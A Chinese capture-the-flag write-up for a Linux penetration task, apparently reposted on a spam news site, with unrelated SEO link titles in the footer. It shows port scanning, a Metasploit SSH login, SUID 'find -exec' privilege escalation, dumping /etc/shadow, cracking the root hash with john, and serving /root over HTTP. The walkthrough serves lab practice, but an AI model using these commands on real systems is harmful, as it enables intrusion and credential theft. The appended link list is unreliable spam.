当前位置: 首页 > news >正文

手机建站永久免费软件广州seo网站开发

手机建站永久免费软件,广州seo网站开发,随申行是国企嘛?,互联网网站开发有哪些职位2023年中职"网络安全"—Linux系统渗透提权② Linux操作系统渗透测试任务环境说明:1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag…

2023年中职"网络安全"—Linux系统渗透提权②

  • Linux操作系统渗透测试
    • 任务环境说明:
      • 1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
      • 2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
      • 3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
      • 4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
      • 5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

Linux操作系统渗透测试

任务环境说明:

  • 服务器场景:Server2203(关闭链接)
  • 用户名:hacker 密码:123456

1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV 靶机IP        # -p- 全端口,-sV 版本探测


flag: 2232/tcp

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

ssh hacker@靶机IP -p 2232            # -p 指定端口,这里有点小坑,应该kali的ssh版本高,靶机的ssh版本低,导致的。

# 解法 1
ssh hacker@靶机IP -p 2232 -oKexAlgorithms=+diffie-hellman-group1-sha1        # -oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接

legacy.html

# 解法 2 
msfconsole                    # 我只说你可能不懂得
search ssh_login
use 0
set RHOSTS 靶机IP
set username hacker
set password 123456
set RPORT 2232                # 注意一定要改端口,别忘记了
run
sessions -l                   # 列出会话
sessions 1                    # 连接第一个会话

uname -a        # 查看系统基本信息


flag: 1doLfH31

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a        # 查看系统基本信息


flag: 2.6.18-8.el5

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

find / -perm -u=s -type f 2>/dev/null

touch 1                            # 创建个文件
ls                                 # ls 查看文件
/usr/bin/find 1 -exec id \;        # 提权 -exec 执行命令 \; 结束

/usr/bin/find 1 -exec ls /root \;
/usr/bin/find 1 -exec cat /root/key.txt \;


flag: 84pPxbiP

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

/usr/bin/find 1 -exec cat /etc/shadow \;

vim hash            # 把root信息行写入进去
cat hash            # 查看是否写入成功
john hash           # 破解密码


flag: darkman

  1. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
su root                            # 切换root用户
id                                 # 查看id是否为root
cd                                 # 不加参数会直接回到当前用户的家目录
pwd                                # 查看当前所在目录路径
python -V                          # 查看当前python版本
python -m SimpleHTTPServer 8080    # 开启HTTP服务,端口8080

访问的时候一定要指定8080端口


flag: HVcKG7tf

http://www.shuangfujiaoyu.com/news/48812.html

相关文章:

  • 广东省住房与城乡建设厅网站推广产品引流的最佳方法
  • 网站忧化靠谱seo淘宝优化标题都是用什么软件
  • 网站框架地图百度快速排名用是
  • 怎么做五合一网站新闻类软文营销案例
  • 网站运维工作内容市场调研报告的基本框架
  • 网站怎么做速排推广普通话演讲稿
  • 网站建设规划表简述seo和sem的区别与联系
  • wordpress建站的利弊怎样做百度推广
  • 国外做化工产品的网站长沙seo公司排名
  • 北京建网站找哪个公司中国今天最新军事新闻
  • 自适应网站平台沧州网络推广外包公司
  • 做设计必知网站网站seo排名优化工具在线
  • 电子商务烟台网站建设腾讯疫情实时数据
  • 360网站seo如何做厦门关键词排名优化
  • 专业网站建设搭建2023年6月份疫情严重吗
  • 外贸开源网站建站流程主要有哪些
  • 免费域名申请网站空间最新新闻事件今天疫情
  • 百度做网站吗网站seo推广公司靠谱吗
  • 做外贸生意哪个网站好未来网络营销的发展趋势
  • 北美购物网站排名网站设计制作的服务怎么样
  • 一级a做爰片就在线手机看韩国网站seo综合查询站长工具关键词
  • 免费空间自助建站模板网站怎么优化推广
  • 用别人网站做app的危害seo网站推广工具
  • 运维兼职平台南京seo代理
  • 工业设计和产品设计的区别网站建设推广优化
  • 淄川政府网站建设公司产品营销策略有哪些
  • 做药物分析网站百度大数据分析
  • 帮人注册网站 做appgoogle官网进入
  • 导航网站怎么做seosemester是什么意思
  • dz网站模版怎样自己做网站